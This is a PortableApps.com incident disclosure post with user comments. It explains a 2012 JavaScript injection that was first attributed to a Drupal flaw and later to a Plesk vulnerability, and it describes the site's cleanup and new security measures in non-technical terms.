Earlier today, a 'possible malware' warning appeared about PortableApps.com within Norton 360, Mozilla Firefox, within Google search results and similar products. This was due to an attempted hack on PortableApps.com via a Drupal exploit Plesk exploit. No PortableApps.com portable apps, databases, logins, user data, project data or security credentials were compromised. A full security audit was undertaken in the hours after the attempt to ensure nothing else was affected (it wasn't) and additional security measures were implemented to ensure everything keeps on working. The full details follow...
Drupal Vulnerability
Drupal, the content management system that runs PortableApps.com, released a security update yesterday to deal with this issue. Unfortunately, we did not receive the standard security update notification from Drupal.org to update the site. Compounding the issue, it seems one of the automated scanners that scans websites for this vulnerability was updated to include it before many Drupal sites had been updated.
Update on February 11th: It wasn't Drupal...
The Attempted Exploit (a bit technical)
The exploit allows a third party, under certain circumstances, to enable the inclusion of certain Javascript from another site (referred to as Cross Site Scripting or XSS) in the code of a website for potentially nefarious purposes. The automated attack permitted a portion of Javascript code to be included on PortableApps.com via an unused file within our Drupal theme. The attack was not fully successful, however, as the code was incomplete. The code the attack attempted to insert is what's known as a blackhole toolkit, a set of Javascript commands designed to exploit known vulnerabilities in the visitors browser. As long as a user has an up to date browser, operating system and plugins, they would be immune even if a blackhole toolkit was able to execute on their system. The code did however setup a potential Javascript redirection to a 3rd-party server that appears to have been compromised earlier in the day. This server appears to have been removed from service at around the same time or soon after the redirect was setup. While we cannot fully rule out the possibility that a small number of users may have been served a Javascript file from that server, we have no reports of any users experiencing any issues.
The Detection and Warnings
Although the exploit did not fully succeed on the PortableApps.com server, enough of the Javascript code and redirect was present to trigger a detection of the file through Google and Norton 360's automated scanners. This detection accounts for any warnings you may have seen when accessing the site via Mozilla Firefox today or through Google's search results.
Patching and Proactive Security Measures
As soon as the potential security vulnerability was known, the Drupal patch was applied and verified and a full security audit was begun. All files updated within the last 24 hours were verified and the one affected file was removed. We also elected to take extra time and reset all remote login criteria and database access passwords. Although no unauthorized access to any of these systems had been made, we thought it best to err on the side of caution and be absolutely sure that no further issues occur. We then fully cleared the website cache and had it rebuild all 26,000+ pages of PortableApps.com along with all associated files. Finally, full virus scans have been run on all our machines and all have come back clean. If you'd like to err on the side of being extra-cautious, scanning your machine and drive for badware is always a good idea.
Awaiting Warning Removal - (UPDATE: Warnings Removed)
The malware removal systems are much quicker at identifying a potential security risk than in being updated to see a server is confirmed clean, so although the site did not host any malware and is confirmed clean, the Google/Mozilla warning system is was still showing the site as a possible security issue several hours later. Google was notified that the site was confirmed clean at 4pm NY time today. Symantec has already removed their warning from Norton 360 and shows no issues now. Bing has also removed any warnings.
UPDATE FEB 4 @ 1AM NY TIME: Google has removed PortableApps.com from its potentially suspicious sites list. Mozilla Firefox users no longer see a warning. Search results in Google still show a warning but this will hopefully be resolved shortly. The Google search result warnings were removed a few hours later.
Google, Feb 4 @ 1AMA review for this site has finished. The site was found clean. The badware warnings from web search are being removed. Please note that it can take some time for this change to propagate.
Next Steps
We've added additional policies to ensure that Drupal security vulnerabilities are addressed much sooner after being announced so we can beat the automated tools to the punch on future vulnerabilities. We've also added additional monitoring to keep an eye on potential threats as they arise as well as implementing faster notifications of admins when this occurs. Finally, we have added in additional paid antivirus scanning and paid automated vulnerability scanning by an industry-leading external party.
On a personal note, I'd like to apologize for any inconvenience or scare this has caused any of our developers and users. We take every precaution to ensure the safety of our apps, data and website, so it's always a bit frightening when something like this occurs, even when the attempted intrusion doesn't fully succeed and apparently hasn't negatively impacted any of our users. We will continue to give our all to ensure you have access to the best, most-secure, most-consistent and fully legal set of portable software in the world for years to come.
Kind Regards,
John
Visit the Community page
Join our forums
Subscribe to our email newsletter
Subscribe with RSS
Follow us on Facebook
Follow us on LinkedIn
Follow us on Twitter
Follow us on Mastodon
Follow us on BlueSky
Comments
Why in the world would somebody attack PortableApps.com?
One of our Facebook followers asked "Why in the world would somebody attack PortableApps.com?" I thought the answer would be of interest to folks on here as well.
"It was an automated attack. There are scripting tools that just scan websites using common content management and forum systems (Drupal, Joomla, WordPress, etc) and automatically report back the vulnerability and let the attacker insert code (in this case, an attempt to redirect a Javascript file to a 3rd party site in India on a server that was compromised). Folks basically sit running these tools on all websites, especially the most popular sites. As PortableApps.com is in the top 5,000 sites in the world, we get auto-scanned a lot. And as Drupal has been getting more popular as a CMS, the hacking tools have gotten better at implementing exploits for it more quickly."
The Reason why they attack any high traffic site
The main reason why these "folks" attack high traffic sites is because if they are successful in changing just a bit of code on the website to redirect visitors to another page, or to a automatic download of a virus, they are able to make a lot of money unethically.
The Benefit of Open Source content Management frameworks such a Drupal (used by PortableApps.com) and Wordpress is that many developers around the world try an find security holes and when found make it possible for people to update and fix those holes.
Unfortunately the attackers are more motivated to attack(since there is money in it for them), than the website owners to update (since it could mean incompatibilities with plugins etc)
I was shocked to see that PortableApps was labeled as a Malware site, and it is sad that Google / StopMalware doesn't allow speedy rescanning to confirm you are clean.
It also seem Google places websites into "groups" or "neighbourhoods" and if enough websites in that neighbourhood is branded, then the lot gets branded.
Well, I hope the Malware warnings gets corrected soon, as PortableApps.com provides an invaluable service! (PS: Nearly all Mac Apps are already Portable, so someone has to help the Windows users..)
Thanks again for the great website and service over the years!
The Reason why they attack any high traffic site
(PS: Nearly all Mac Apps are already Portable, so someone has to help the Windows users..)
You are just kidding right?
Warnings?
I went on a downloading binge yesterday and today and haven't seen any warnings and at all. Thanks for the information, I'll scan all my apps just to be sure.
I will say: thumbs up for the
I will say: thumbs up for the quick reaction on this irritating problem. Also my compliments for communicating this with the users of the site.
Most sites and company's hopes that nobody finds out what happend and keep there mouth shut.
Responsible Response
It is true that many companies would hope to sweep something like this under the rug, especially since it doesn't appear to have affected anyone. In my opinion, the responsible response is to be up-front and try to make things as clear as possible to both the techies and non-techies. Brushing it under the rug and just saying 'everything was fine' without explaining what occurred to the best of our knowledge, wouldn't be fair to our community's past, present or future members. As one of the world's largest open source projects, it only makes sense to be open and honest about it.
Thank you.
Well done.
Agreed
I agree John. Job well done. I find your response to the entire situation very refreshing. It's sad that it is not the norm in this day and age.
ummm
Not sure why but 10:13 NY (Maine) time I attempted to access PA Tracker page via my Google bookmarks and I still get the Firefox Warning Page
Updated Noon this issue resolved
Intense
I didn't go online yesterday, so I missed the whole shebang, but I'm glad the issue got resolved quickly.
Couldn't believe...
...when I came to your site yesterday, just as I wanted to dload those fabulous portable apps that I had just discovered on the web the day before! But life was nice again this morning, to see your website being recovered and clean again!
Thanks a lot and keep on a-p-p-i-n-g!!
Regards
Dave
Welcome back
Welcome back
I wasn't able to visit your website for awhile, I was warned it's a risk to do so.
How can we be completely confident and certain that all files are clean?
I don't know how you can, but
I don't know how you can, but I am. :evil:
Can't post
I tried to reply to post 30976, using links to various posts within PortableApps.com, and I got a message from Drupal saying "A little bit of server maintence is under way."
But the URL bar says portableappsDOTcomSLASHspamSLASHdenied.
What gives?
Spam Filter
We're experimenting with re-enabling bits of the spam filtering system with some new settings this weekend. You had a post that was marked as spam.
For the record
As we discussed in the chat room, that post was actually a normal post that the filter mistakenly marked as spam (you estimated that at the time, the filter was flagging 40% of posts mistakenly). It was actually a post meant to help a noob. I don't want people to think that I post anything bad.
I Went To...
https://portableapps.com/spam/denied And It Said
A little bit of server maintence is under way. You can download apps directly from the PortableApps.com Platform 10.0.1.
Have some tea and we'll be back before you know it...
(There were some biscuits around here somewhere, too, but we think one of our hard-working developers ate them all.)
And It Was Quite Funny.
Thanks for clarifying this
Thanks for clarifying this issue John.
Though i do have to say i like the old font style of the menu bar better than the new one.
You can't please everyone
You can't please everyone
Thank you!
Thanks for the post. I didn't check this site yesterday for updates so I guess I 'missed' all the fun.
Clear communication to users on what happened and what the site is doing to rectify the situation is always the way to go. I wish more sites (*cough* Sony Playstation Network *cough*) would have done this in the past. Web sites with people that 'get it' running them always set the bar high in this area (PortableApps, Zappos, etc).
Opera Malware Warning Feb 9
Just to let you know, for the first time, I just got a Malware warning about this site a few minutes ago. In fact, it showed on my portable Opera speed dial. When I clicked on the speed dial, it showed the warning that the site has been reported for distributing malware. I know that's not true so I came here anyway, but thought you should know.
Odd
I took the site offline to double-check things. The site scanner and all blacklists show as clean. I'm running deeper scans and monitoring now to be sure.
Opera's Malware Blacklist provider
Contact support[at]search[dot]yandex[dot]com
http://www.opera.com/support/kb/view/963/
Geez
I just thought you were having afternoon tea.......
Warning Removed
The warning has been removed and the site has scanned clean with Opera's warning provider. We're investigating further on the cause. I'll post here when I have more information.
Bullguard reporting download as infected
I have been happily using this program for sometime and went to update it today. Bullguard has just stopped an infected download.
Virus Name:Gen.Trojan.Heur.FU.dyW@aeT8pei
Infected Object: kent.dl.source.net/project/portableapps/PortabbleApps.com%20Platform/Additional%20Versions/PortableApps.com_Platform_Setup_10.0.1exe
Is this because of the recent attack or something else?
False positive
That's a generic heuristics-based false positive. They're quite common, unfortunately.
I know here this website is
I know here this website is safe... http://www.mywot.com/en/scorecard/portableapps.com
Also from McAfee SiteAdvisor... http://www.siteadvisor.com/sites/portableapps.com
Update Feb 11, 2012 - It Wasn't Drupal
After doing a more thorough investigation with our engineering team at Rackspace, we've determined a bit more about the hack. First off, it was not due to the Drupal exploit as we had thought. It was due to a vulnerability within Plesk, an administrative interface to the server used to handle server management.
As we have a server running an older version of Red Hat Enterprise Linux (RHEL), we're not running the current version of Plesk but an older version. Unlike the other server packages like PHP, mySQL, Apache, etc within RHEL, Plesk is not automatically updated. It is updated upon request for new features or whenever Plesk's publisher notifies users that there is a security vulnerability. Unfortunately, there was a vulnerability and a patch for it that Plesk did not notify Rackspace about. This exploit affected numerous websites including some large companies as well.
The exploit was in Plesk's ability to change the contact name on a given domain which, when exploited properly, gave a 3rd party limited access to Plesk's file manager. This is what the attacker used to place the malicious Javascript file in a location that would cause Drupal to cache it along with our standard files. The attacker also used this exploit to place a PHP file allowing them to re-place the Javascript file at a later date without needing to use the Plesk exploit.
This past Friday, the attacker re-placed the Javascript, again pointing to a compromised international server that was taken down quite quickly. The attack was found much more quickly this time (before any of the major vulnerability scanners even found it) and this allowed us to determine the root cause and remove the affected Javascript file as well as the leave-behind code to re-place it. Plesk was also patched to fix the exploit. Just to be absolutely sure, we setup a firewall to wall off Plesk from everyone except Rackspace and our NYC office.
We spent additional time Friday reviewing all the access logs for Plesk, Drupal and Apache and no additional files were accessed or altered by the 3rd party. The PortableApps.com portable apps, user details, website data, administrative logins, database passwords, etc were all uncompromised again. So your portable software and personal information are still safe.
Thank you again for bearing with us during this incident and week-long investigation. We look forward to providing you with awesome portable software for years to come.
Kind Regards,
John
Thanks for the update
I am glad nothing serious happend and you got it fixed so quickly!